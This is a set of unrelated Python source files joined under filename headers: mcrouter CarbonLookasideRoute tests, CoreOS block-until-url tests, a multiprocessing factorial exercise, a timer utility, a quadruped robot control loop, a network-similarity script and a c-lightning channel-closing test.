sys.stdout = output
client.main(args)
self.assertEqual(output.getvalue(), expected)
try:
run([], ex_typed_output)
run(['-j'], ex_json_output)
run(['--json-output'], ex_json_output)
finally:
sys.stdout = current_stdout
class TestCtxEntryPoint(testtools.TestCase):
def test_ctx_in_path(self):
subprocess.call(['ctx', '--help'])
class TestPathDictAccess(testtools.TestCase):
def test_simple_set(self):
obj = {}
path_dict = PathDictAccess(obj)
path_dict.set('foo', 42)
self.assertEqual(obj, {'foo': 42})
def test_nested_set(self):
obj = {'foo': {}}
path_dict = PathDictAccess(obj)
path_dict.set('foo.bar', 42)
self.assertEqual(obj, {'foo': {'bar': 42}})
def test_set_index(self):
obj = {'foo': [None, {'bar': 0}]}
path_dict = PathDictAccess(obj)
path_dict.set('foo[1].bar', 42)
self.assertEqual(obj, {'foo': [None, {'bar': 42}]})
def test_set_nonexistent_parent(self):
obj = {}
path_dict = PathDictAccess(obj)
path_dict.set('foo.bar', 42)
self.assertEqual(obj, {'foo': {'bar': 42}})
def test_set_nonexistent_parent_nested(self):
obj = {}
path_dict = PathDictAccess(obj)
path_dict.set('foo.bar.baz', 42)
self.assertEqual(obj, {'foo': {'bar': {'baz': 42}}})
def test_simple_get(self):
obj = {'foo': 42}
path_dict = PathDictAccess(obj)
result = path_dict.get('foo')
self.assertEqual(result, 42)
def test_nested_get(self):
obj = {'foo': {'bar': 42}}
path_dict = PathDictAccess(obj)
result = path_dict.get('foo.bar')
self.assertEqual(result, 42)
def test_nested_get_shadows_dotted_name(self):
obj = {'foo': {'bar': 42}, 'foo.bar': 58}
path_dict = PathDictAccess(obj)
result = path_dict.get('foo.bar')
self.assertEqual(result, 42)
def test_index_get(self):
obj = {'foo': [0, 1]}
path_dict = PathDictAccess(obj)
result = path_dict.get('foo[1]')
self.assertEqual(result, 1)
def test_get_nonexistent(self):
obj = {}
path_dict = PathDictAccess(obj)
self.assertRaises(RuntimeError, path_dict.get, 'foo')
def test_get_by_index_not_list(self):
obj = {'foo': {0: 'not-list'}}
path_dict = PathDictAccess(obj)
self.assertRaises(RuntimeError, path_dict.get, 'foo[0]')
def test_get_by_index_nonexistent_parent(self):
obj = {}
path_dict = PathDictAccess(obj)
self.assertRaises(RuntimeError, path_dict.get, 'foo[1]')
|
test_carbonlookaside_route.py
|
# Copyright (c) 2015-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the LICENSE
# file in the root directory of this source tree.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from mcrouter.test.McrouterTestCase import McrouterTestCase
import tempfile
import os
import time
from string import Template
import threading
import Queue
class CarbonLookasideTmpConfig():
routeConfigFile = """
{
"pools": {
"A": {
"servers": [ "127.0.0.1:12345" ]
}
},
"route": {
"type": "CarbonLookasideRoute",
"prefix": "$TEMPLATE_PREFIX",
"ttl": $TEMPLATE_TTL,
"flavor": "$TEMPLATE_FILENAME",
"lease_settings": {
"enable_leases": $TEMPLATE_LEASE_ENABLE,
"initial_wait_interval_ms": $TEMPLATE_LEASE_WAIT_INTERVAL,
"num_retries": $TEMPLATE_LEASE_NUM_RETRIES,
},
"child": [
"PoolRoute|A"
]
}
}
"""
routeLatencyConfigFile = """
{
"pools": {
"A": {
"servers": [ "127.0.0.1:12345" ]
}
},
"route": {
"type": "CarbonLookasideRoute",
"prefix": "$TEMPLATE_PREFIX",
"ttl": $TEMPLATE_TTL,
"flavor": "$TEMPLATE_FILENAME",
"lease_settings": {
"enable_leases": $TEMPLATE_LEASE_ENABLE,
"initial_wait_interval_ms": $TEMPLATE_LEASE_WAIT_INTERVAL,
"num_retries": $TEMPLATE_LEASE_NUM_RETRIES,
},
"child": {
"type": "LatencyInjectionRoute",
"child": "PoolRoute|A",
"before_latency_ms": $TEMPLATE_BEFORE_LATENCY,
"after_latency_ms": $TEMPLATE_AFTER_LATENCY,
}
}
}
"""
clientConfigFile = """
{
"pools": {
"A": {
"servers": [ "127.0.0.1:${TEMPLATE_PORT}" ]
}
},
"route": "PoolRoute|A"
}
"""
flavorConfigFile = """
{
"options": {
"asynclog_disable": "true",
"config": "${TEMPLATE_FILENAME}",
"failures_until_tko": "10",
"num_proxies": "4",
"probe_delay_initial_ms": "5000",
"scuba_sample_period": "0",
"server_timeout_ms": "250"
}
}
"""
def cleanup(self):
if not self.tmpRouteFile:
os.remove(self.tmpRouteFile)
if not self.tmpClientFile:
os.remove(self.tmpClientFile)
if not self.tmpFlavorFile:
os.remove(self.tmpFlavorFile)
def __init__(self, prefix, ttl, port, lease_enable='false', lease_interval=0,
lease_num_retries=0, latency_before=0, latency_after=0):
# Client file configuration
with tempfile.NamedTemporaryFile(mode='w', delete=False) as self.tmpClientFile:
clientDict = {'TEMPLATE_PORT': port}
src = Template(self.clientConfigFile)
result = src.substitute(clientDict)
self.tmpClientFile.write(result)
# Flavor file configuration
with tempfile.NamedTemporaryFile(mode='w', delete=False) as self.tmpFlavorFile:
flavorDict = {'TEMPLATE_FILENAME': 'file:' + self.tmpClientFile.name}
src = Template(self.flavorConfigFile)
result = src.substitute(flavorDict)
self.tmpFlavorFile.write(result)
# Route file configuration
with tempfile.NamedTemporaryFile(mode='w', delete=False) as self.tmpRouteFile:
routeDict = {'TEMPLATE_PREFIX': prefix,
'TEMPLATE_TTL': ttl,
'TEMPLATE_FILENAME': 'file:' + self.tmpFlavorFile.name,
'TEMPLATE_LEASE_ENABLE': lease_enable,
'TEMPLATE_LEASE_WAIT_INTERVAL': lease_interval,
'TEMPLATE_LEASE_NUM_RETRIES': lease_num_retries,
'TEMPLATE_BEFORE_LATENCY': latency_before,
'TEMPLATE_AFTER_LATENCY': latency_after}
if latency_before or latency_after:
src = Template(self.routeLatencyConfigFile)
else:
src = Template(self.routeConfigFile)
result = src.substitute(routeDict)
self.tmpRouteFile.write(result)
def getFileName(self):
return self.tmpRouteFile.name
class TestCarbonLookasideRouteBasic(McrouterTestCase):
prefix = "CarbonLookaside"
ttl = 120
extra_args = []
def setUp(self):
self.mc = self.add_server(self.make_memcached())
self.tmpConfig = CarbonLookasideTmpConfig(self.prefix, self.ttl,
self.mc.getport())
self.config = self.tmpConfig.getFileName()
self.mcrouter = self.add_mcrouter(
self.config,
extra_args=self.extra_args)
def tearDown(self):
self.tmpConfig.cleanup()
def test_carbonlookaside_basic(self):
n = 20
# Insert 20 items into memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.set(key, 'value'))
# Get the 20 items from memcache, they will be set in
# carbonlookaside
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
# Query carbonlookaside directly with the configured prefix
# that the items have indeed been stored.
for i in range(0, n):
key = '{}someprefix:{}:|#|id=123'.format(self.prefix, i)
self.assertTrue(self.mc.get(key), 'value')
# Query the items through mcrouter and check that they are there
# This query will be fed from carbonlookaside.
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
def test_carbonlookaside_larger(self):
n = 200
# Insert 200 items into memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.set(key, 'value'))
# Get the 200 items from memcache, they will be set in
# carbonlookaside
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
# Query carbonlookaside directly with the configured prefix
# that the items have indeed been stored.
for i in range(0, n):
key = '{}someprefix:{}:|#|id=123'.format(self.prefix, i)
self.assertTrue(self.mc.get(key), 'value')
# Query the items through mcrouter and check that they are there
# This query will be fed from carbonlookaside.
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
class TestCarbonLookasideRouteExpiry(McrouterTestCase):
prefix = "CarbonLookaside"
ttl = 2
extra_args = []
def setUp(self):
self.mc = self.add_server(self.make_memcached())
self.tmpConfig = CarbonLookasideTmpConfig(self.prefix, self.ttl,
self.mc.getport())
self.config = self.tmpConfig.getFileName()
self.mcrouter = self.add_mcrouter(
self.config,
extra_args=self.extra_args)
def tearDown(self):
self.tmpConfig.cleanup()
def test_carbonlookaside_ttl_expiry(self):
n = 20
# Insert 20 items into memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.set(key, 'value'))
# Get the 20 items from memcache, they will be set in
# carbonlookaside
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
# Query carbonlookaside directly with the configured prefix
# that the items have indeed been stored.
for i in range(0, n):
key = '{}someprefix:{}:|#|id=123'.format(self.prefix, i)
self.assertTrue(self.mc.get(key), 'value')
time.sleep(2)
# Query carbonlookaside directly and check they have expired
for i in range(0, n):
key = '{}someprefix:{}:|#|id=123'.format(self.prefix, i)
self.assertFalse(self.mc.get(key), 'value')
class TestCarbonLookasideRouteNoExpiry(McrouterTestCase):
prefix = "CarbonLookaside"
ttl = 0
extra_args = []
def setUp(self):
self.mc = self.add_server(self.make_memcached())
self.tmpConfig = CarbonLookasideTmpConfig(self.prefix, self.ttl,
self.mc.getport())
self.config = self.tmpConfig.getFileName()
self.mcrouter = self.add_mcrouter(
self.config,
extra_args=self.extra_args)
def tearDown(self):
self.tmpConfig.cleanup()
def test_carbonlookaside_ttl_no_expiry(self):
n = 20
# Insert 20 items into memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.set(key, 'value', exptime=2))
# Get the 20 items from memcache, they will be set in
# carbonlookaside
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
time.sleep(3)
# Items should have expired in memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertFalse(self.mc.get(key), 'value')
# Items still available in carbonlookaside through mcrouter
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
class TestCarbonLookasideRouteLeases(McrouterTestCase):
prefix = "CarbonLookaside"
ttl = 0
extra_args = []
def setUp(self):
self.mc = self.add_server(self.make_memcached())
self.tmpConfig = CarbonLookasideTmpConfig(self.prefix, self.ttl,
self.mc.getport(), 'true',
10, 10)
self.config = self.tmpConfig.getFileName()
self.mcrouter = self.add_mcrouter(
self.config,
extra_args=self.extra_args)
def tearDown(self):
self.tmpConfig.cleanup()
def test_carbonlookaside_basic_leases(self):
n = 20
# Insert 20 items into memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.set(key, 'value'))
# Get the 20 items from memcache, they will be set in
# carbonlookaside
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
# Query carbonlookaside directly with the configured prefix
# that the items have indeed been stored.
for i in range(0, n):
key = '{}someprefix:{}:|#|id=123'.format(self.prefix, i)
self.assertTrue(self.mc.get(key), 'value')
# Query the items through mcrouter and check that they are there
# This query will be fed from carbonlookaside.
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
def test_carbonlookaside_larger_leases(self):
n = 200
# Insert 200 items into memcache
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.set(key, 'value'))
# Get the 200 items from memcache, they will be set in
# carbonlookaside
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
# Query carbonlookaside directly with the configured prefix
# that the items have indeed been stored.
for i in range(0, n):
key = '{}someprefix:{}:|#|id=123'.format(self.prefix, i)
self.assertTrue(self.mc.get(key), 'value')
# Query the items through mcrouter and check that they are there
# This query will be fed from carbonlookaside.
for i in range(0, n):
key = 'someprefix:{}:|#|id=123'.format(i)
self.assertTrue(self.mcrouter.get(key), 'value')
class TestCarbonLookasideRouteLeasesHotMiss(McrouterTestCase):
prefix = "CarbonLookaside"
ttl = 0
extra_args = []
def setUp(self):
self.mc = self.add_server(self.make_memcached())
self.tmpConfig = CarbonLookasideTmpConfig(self.prefix, self.ttl,
self.mc.getport(), 'true',
10, 3, 0, 5000)
self.config = self.tmpConfig.getFileName()
self.mcrouter = self.add_mcrouter(
self.config,
extra_args=self.extra_args)
self.mcrouter2 = self.add_mcrouter(
self.config,
extra_args=self.extra_args)
def tearDown(self):
self.tmpConfig.cleanup()
def async_get(self, key, ret):
ret.put(self.mcrouter.get(key))
def test_carbonlookaside_basic_leases(self):
# Add KV pair directly to MC to avoid backend latency and
# carbonlookaside intereference
key = 'auld_lang_syne'
self.assertTrue(self.mc.set(key, 'value'))
# Make an async request for the key. It will initially do a lease get
# to carbonlookaside which will return a lease token. Note using a
# latency route here to slow things down so there is time to provoke
# a hot miss before backend responds and carbon lookaside does a lease
# set.
ret = Queue.Queue()
t = threading.Thread(target=self.async_get, args=(key, ret))
t.start()
# Ensure lease get has arrived at MC server before proceeding
stats = self.mc.stats()
while stats["cmd_lease_get"] == '0':
stats = self.mc.stats()
# Hot miss
self.assertTrue(self.mcrouter2.get(key), 'value')
stats = self.mc.stats()
self.assertTrue(stats["cmd_lease_get"] == '5')
# Now wait on the back end returning and the write to carbonLookaside
# completing.
t.join()
self.assertTrue(ret.get(), 'value')
stats = self.mc.stats()
# the lookaside sets dont block, so allow it to retry till set arrives
# at the local MC server.
retry = 0
while stats["cmd_lease_set"] == '0' and retry < 3:
time.sleep(1)
retry += 1
self.assertTrue(stats["cmd_lease_set"] == '1')
self.assertTrue(stats["lease_tokens_in_use"] == '0')
|
test_block_until_url.py
|
#!/usr/bin/python3
# Copyright (c) 2013 The CoreOS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import http.server
import os
import select
import signal
import subprocess
import threading
import time
import unittest
from http import HTTPStatus
script_path = os.path.abspath('%s/../../bin/block-until-url' % __file__)
class UsageTestCase(unittest.TestCase):
def test_no_url(self):
proc = subprocess.Popen([script_path],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(proc.returncode, 1)
self.assertEqual(out, b'')
self.assertIn(b'invalid url', err)
def test_invalid_url(self):
proc = subprocess.Popen([script_path, 'fooshizzle'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(proc.returncode, 1)
self.assertEqual(out, b'')
self.assertIn(b'invalid url', err)
class TestRequestHandler(http.server.BaseHTTPRequestHandler):
def send_test_data(self):
if self.path == '/ok':
ok_data = b'OK!\n'
self.send_response(HTTPStatus.OK)
self.send_header('Content-type', 'text/plain')
self.send_header('Content-Length', str(len(ok_data)))
self.end_headers()
if self.command != 'HEAD':
self.wfile.write(ok_data)
elif self.path == '/404':
self.send_error(HTTPStatus.NOT_FOUND)
else:
# send nothing so curl fails
pass
def do_GET(self):
self.send_test_data()
def do_HEAD(self):
self.send_test_data()
def log_message(self, format, *args):
pass
class HttpTestCase(unittest.TestCase):
def setUp(self):
self.server = http.server.HTTPServer(
('localhost', 0), TestRequestHandler)
self.server_url = 'http://%s:%s' % (self.server.server_name, self.server.server_port)
self.server_thread = threading.Thread(target=self.server.serve_forever)
self.server_thread.start()
def tearDown(self):
self.server.shutdown()
self.server_thread.join()
self.server.server_close()
def test_quick_ok(self):
proc = subprocess.Popen([script_path, '%s/ok' % self.server_url],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def test_quick_404(self):
proc = subprocess.Popen([script_path, '%s/404' % self.server_url],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(proc.returncode, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def test_timeout(self):
proc = subprocess.Popen([script_path, '%s/bogus' % self.server_url],
bufsize=4096,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
timeout = time.time() + 2 # kill after 2 seconds
while time.time() < timeout:
time.sleep(0.1)
self.assertIs(proc.poll(), None, 'script terminated early!')
proc.terminate()
out, err = proc.communicate()
self.assertEqual(proc.returncode, -signal.SIGTERM)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
if __name__ == '__main__':
unittest.main()
|
Q8-4processos.py
|
#Dado um vetor A de tamanho N com apenas números inteiros positivos, calcule o fatorial de cada um deles e armazene o resultado em um vetor B.
#usando o módulo multiprocessing com 4 processos.
import multiprocessing,random
def fatorial(n):
fat = n
for i in range(n - 1, 1, -1):
fat = fat * i
return (fat)
def fatorialProcesso(vetor,q,start,end):
for item in vetor[start:end]:
factorial = fatorial(item)
q.put(factorial)
return
def comProcessos(vetor,list_size,thread_num):
q = multiprocessing.Queue()
resposta = []
listaDeProcessos = []
for i in range(thread_num):
start = i * int(list_size // thread_num)
end = (i + 1) * int(list_size // thread_num)
p = multiprocessing.Process(target=fatorialProcesso, args=(vetor,q, start,end))
p.start()
listaDeProcessos.append(p)
for p in listaDeProcessos:
p.join()
while q.qsize() > 0:
resposta.append(q.get())
return resposta
if __name__ == "__main__":
n_threads = 4
VETOR_A = []
vetor = int(input("Digite o tamanho do vetor:"))
for i in range(1, vetor + 1):
vet = random.randint(1, 10)
VETOR_A.append(vet)
list_size = len(VETOR_A)
print("Vetor original:")
print(VETOR_A)
print("Novo vetor:")
print(comProcessos(VETOR_A,list_size,n_threads))
|
duration.py
|
# coding: utf-8
import time;
import re
from systemtools.basics import *
from threading import Thread
class Timer:
def __init__(self, callback, interval, sleepFirst=False, sleepCount=1000):
"""
interval in seconds
"""
self.sleepCount = sleepCount
self.interval = interval
self.callback = callback
self.stopped = True
self.firstExec = True
self.sleepFirst = sleepFirst
self.mainThread = None
def isRunning(self):
return not self.stopped
def sleep(self):
sleepPart = self.interval / self.sleepCount
for i in range(self.sleepCount):
if self.isRunning():
time.sleep(sleepPart)
def run(self):
self.stopped = False
while not self.stopped:
if self.firstExec and self.sleepFirst:
self.sleep()
if self.isRunning():
self.callback()
self.sleep()
self.firstExec = False
def start(self):
self.firstExec = True
self.mainThread = Thread(target=self.run)
self.mainThread.start()
def stop(self):
self.stopped = True
class TicToc():
"""
This class provide 2 methods to print time during an execution
"""
def __init__(self, logger=None, marker="-->", msgSeparator=" | message: ", maxDecimal=2):
self.logger = logger
self.startTime = None;
self.previousTime = None;
self.marker = marker;
self.msgSeparator = msgSeparator;
self.maxDecimal = maxDecimal;
def setMaxDecimal(self, maxDecimal):
self.maxDecimal = maxDecimal;
def tic(self, msg=None, display=True):
"""
This method start the timer and print it, or print the time between the previous tic()
and the current tic(). You can print a message by giving it in parameters.
It's the local duration.
"""
if msg is None:
msg = "";
else:
msg = self.msgSeparator + msg;
if self.startTime is None:
self.startTime = time.time();
self.previousTime = self.startTime;
if display:
self.p(self.marker + " tictoc starts..." + msg);
return -1;
else:
currentTime = time.time();
diffTime = currentTime - self.previousTime;
diffTime = float(float(int(diffTime * (10**self.maxDecimal))) / float((10**self.maxDecimal)));
if display:
self.p(self.marker + " tic: " + self.secondsToHumanReadableDuration(diffTime) + msg); # time duration from the previous tic()
self.previousTime = currentTime;
return diffTime;
def toc(self, msg=None, display=True):
"""
This method print the elapsed time from the first tic().
You can print a message by giving it in parameters.
It's the total duration.
"""
if self.startTime is not None:
if msg is None:
msg = "";
else:
msg = self.msgSeparator + msg;
currentTime = time.time();
diffTime = currentTime - self.startTime;
diffTime = float(float(int(diffTime * (10**self.maxDecimal))) / float((10**self.maxDecimal)));
if display:
self.p(self.marker + " toc total duration: " + self.secondsToHumanReadableDuration(diffTime) + msg);
return diffTime;
return -1;
def p(self, text):
if self.logger is not None:
self.logger.p(text)
else:
print(text)
def secondsToHumanReadableDuration(self, seconds):
"""
:example:
>>> secondsToHumanReadableDuration(0.1)
'0.1s'
>>> secondsToHumanReadableDuration(10)
'10.0s'
>>> secondsToHumanReadableDuration(10.2)
'10.2s'
>>> secondsToHumanReadableDuration(3600)
'1h 0m 0.0s'
>>> secondsToHumanReadableDuration(7210)
'2h 0m 10.0s'
>>> secondsToHumanReadableDuration(7270)
'2h 1m 10.0s'
"""
m, s = divmod(seconds, 60.0)
h, m = divmod(m, 60.0)
h = int(h)
m = int(m)
result = ""
if h != 0:
result += str(h) + "h "
result += str(m) + "m "
elif m != 0:
result += str(m) + "m "
result += floatAsReadable(s) + "s"
return result
|
run_robot.py
|
import os
import sys
import threading
import time
import numpy as np
from PIL import Image
from multiprocessing import Process
import multiprocessing
sys.path.append("/home/ubuntu/Robotics/QuadrupedRobot")
sys.path.extend([os.path.join(root, name) for root, dirs, _ in os.walk("/home/ubuntu/Robotics/QuadrupedRobot") for name in dirs])
from Mangdang.LCD.ST7789 import ST7789
from Mangdang.LCD.gif import AnimatedGif
from src.Controller import Controller
from src.JoystickInterface import JoystickInterface
from src.State import State
from pupper.MovementGroup import MovementLib
from src.MovementScheme import MovementScheme
from pupper.HardwareInterface import HardwareInterface
from pupper.Config import Configuration
from pupper.Kinematics import four_legs_inverse_kinematics
quat_orientation = np.array([1, 0, 0, 0])
cartoons_folder = "/home/ubuntu/Robotics/QuadrupedRobot/Mangdang/LCD/cartoons/"
current_show = ""
disp = ST7789()
def pic_show(disp, pic_name, _lock):
""" Show the specify picture
Parameter:
disp : display instance
pic_name : picture name to show
Return : None
"""
if pic_name == "":
return
global current_show
if pic_name == current_show:
return
image=Image.open(cartoons_folder + pic_name)
image.resize((320,240))
_lock.acquire()
disp.display(image)
_lock.release()
current_show = pic_name
def animated_thr_fun(_disp, duration, is_connect, current_leg, _lock):
"""
The thread funcation to show sleep animated gif
Parameter: None
Returen: None
"""
try:
gif_player = AnimatedGif(_disp, width=320, height=240, folder=cartoons_folder)
last_time = time.time()
last_joint_angles = np.zeros(3)
while True:
if is_connect.value == 1 :
#if ((current_leg[0]==last_joint_angles[0]) and (current_leg[1]==last_joint_angles[1]) and (current_leg[2]==last_joint_angles[2])) == False :
if ((current_leg[0]==last_joint_angles[0]) and (current_leg[1]==last_joint_angles[1])) == False :
last_time = time.time()
last_joint_angles[0] = current_leg[0]
last_joint_angles[1] = current_leg[1]
#last_joint_angles[2] = current_leg[2]
if (time.time() - last_time) > duration :
_lock.acquire()
gif_player.play()
_lock.release()
time.sleep(0.5)
else :
last_time = time.time()
time.sleep(1.5)
except KeyboardInterrupt:
_lock.release()
pass
def cmd_dump(cmd):
"""
debug interface to show all info about PS4 command
Parameter: None
return : None
"""
print("\nGet PS4 command :")
print("horizontal_velocity: ", cmd.horizontal_velocity)
print("yaw_rate ", cmd.yaw_rate)
print("height", cmd.height)
print("pitch ", cmd.pitch)
print("roll ", cmd.roll)
print("activation ", cmd.activation)
print("hop_event ", cmd.hop_event)
print("trot_event ", cmd.trot_event)
print("activate_event ", cmd.activate_event)
def main():
"""Main program
"""
# sleep 4.5s to wait for booting up complete
time.sleep(2.5)
# Create config
config = Configuration()
hardware_interface = HardwareInterface()
# show logo
global disp
disp.begin()
disp.clear()
image=Image.open(cartoons_folder + "logo.png")
image.resize((320,240))
disp.display(image)
# Start animated process
duration = 10
is_connect = multiprocessing.Value('l', 0)
current_leg = multiprocessing.Array('d', [0, 0, 0])
lock = multiprocessing.Lock()
animated_process = Process(target=animated_thr_fun, args=(disp, duration, is_connect, current_leg, lock))
#animated_process.start()
#Create movement group scheme
movement_ctl = MovementScheme(MovementLib)
# Create controller and user input handles
controller = Controller(
config,
four_legs_inverse_kinematics,
)
state = State()
print("Creating joystick listener...")
joystick_interface = JoystickInterface(config)
print("Done.")
last_loop = time.time()
print("Summary of gait parameters:")
print("overlap time: ", config.overlap_time)
print("swing time: ", config.swing_time)
print("z clearance: ", config.z_clearance)
print("x shift: ", config.x_shift)
# Wait until the activate button has been pressed
while True:
print("Waiting for L1 to activate robot.")
while True:
command = joystick_interface.get_command(state)
joystick_interface.set_color(config.ps4_deactivated_color)
if command.activate_event == 1:
break
time.sleep(0.1)
print("Robot activated.")
is_connect.value = 1
joystick_interface.set_color(config.ps4_color)
pic_show(disp, "walk.png", lock)
while True:
now = time.time()
if now - last_loop < config.dt:
continue
last_loop = time.time()
# Parse the udp joystick commands and then update the robot controller's parameters
command = joystick_interface.get_command(state)
#cmd_dump(command)
_pic = "walk.png" if command.yaw_rate ==0 else "turnaround.png"
if command.trot_event == True:
_pic = "walk_r1.png"
pic_show(disp, _pic, lock)
if command.activate_event == 1:
is_connect.value = 0
pic_show(disp, "notconnect.png", lock)
print("Deactivating Robot")
break
state.quat_orientation = quat_orientation
# movement scheme
movement_switch = command.dance_switch_event
gait_state = command.trot_event
if gait_state == True: # if triger tort event, reset the movement number to 0
movement_ctl.resetMovementNumber()
movement_ctl.runMovementScheme(movement_switch)
food_location = movement_ctl.getMovemenLegsLocation()
attitude_location = movement_ctl.getMovemenAttitudeLocation()
controller.run(state,command,food_location,attitude_location)
# Update the pwm widths going to the servos
hardware_interface.set_actuator_postions(state.joint_angles)
current_leg[0]= state.joint_angles[0][0]
current_leg[1]= state.joint_angles[1][0]
#current_leg[2]= state.joint_angles[2][0]
try:
main()
except KeyboardInterrupt:
pass
|
calc-network-collaborative-similarity-async.py
|
import os
import sys
import phpserialize
from multiprocessing import Process
from network import Network
__DIR__ = os.path.dirname(os.path.abspath(__file__))
if len(sys.argv) != 2 or not sys.argv[1].isdigit():
exit('usage: %s bucket' % sys.argv[0])
# read data file
infile = '%s/data/bucket-%03d.txt' % __DIR__
f = open(infile)
links = phpserialize.load(f)
edges = 0
for words in links.get('users').itervalues():
edges += len(words)
def average_degree(network, alias, link_type):
print "<%s> = %f" % (alias, network.average_degree(link_type))
def network_collaborative_similarity(network, alias, link_type, link_n_type):
print "C_%s = %s" % (alias, network.network_collaborative_similarity(link_type, link_n_type, False))
def average_jaccard_similarity(network, alias, link_type, link_n_type):
print "s_%s = %s" % (alias, network.average_jaccard_similarity(link_type, link_n_type, False))
# print basic network info
print 'N = %d' % len(links.get('users'))
print 'M = %d' % len(links.get('objects'))
print 'E = %d' % edges
network = Network(links)
Process(target=average_degree, args=(network, 'k', 'users')).start()
Process(target=average_degree, args=(network, 'd', 'objects')).start()
Process(target=network_collaborative_similarity, args=(network, 'u', 'users', 'objects')).start()
Process(target=average_jaccard_similarity, args=(network, 'o', 'objects', 'users')).start()
Process(target=network_collaborative_similarity, args=(network, 'o', 'objects', 'users')).start()
Process(target=average_jaccard_similarity, args=(network, 'u', 'users', 'objects')).start()
|
test_closing.py
|
from fixtures import * # noqa: F401,F403
from flaky import flaky
from lightning import RpcError
from utils import only_one, sync_blockheight, wait_for, DEVELOPER, TIMEOUT, VALGRIND, SLOW_MACHINE
import os
import queue
import pytest
import re
import threading
import unittest
@unittest.skipIf(not DEVELOPER, "Too slow without --dev-bitcoind-poll")
def test_closing(node_factory, bitcoind, chainparams):
l1, l2 = node_factory.line_graph(2)
chan = l1.get_channel_scid(l2)
fee = 5430 if not chainparams['elements'] else 8955
l1.pay(l2, 200000000)
assert bitcoind.rpc.getmempoolinfo()['size'] == 0
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
bitcoind.generate_block(5)
# Only wait for the channels to activate with DEVELOPER=1,
# otherwise it's going to take too long because of the missing
# --dev-fast-gossip
if DEVELOPER:
wait_for(lambda: len(l1.getactivechannels()) == 2)
wait_for(lambda: len(l2.getactivechannels()) == 2)
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
# This may either be from a local_update or an announce, so just
# check for the substring
assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]
l1.rpc.close(chan)
l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
# And should put closing into mempool.
l1.daemon.wait_for_log('sendrawtx exit 0')
l2.daemon.wait_for_log('sendrawtx exit 0')
# Both nodes should have disabled the channel in their view
wait_for(lambda: len(l1.getactivechannels()) == 0)
wait_for(lambda: len(l2.getactivechannels()) == 0)
assert bitcoind.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(bitcoind.rpc.getrawmempool(False))
billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
assert billboard == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
]
bitcoind.generate_block(1)
l1.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
l2.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
# Make sure both nodes have grabbed their close tx funds
assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
'ONCHAIN:Tracking mutual close transaction',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
])
bitcoind.generate_block(9)
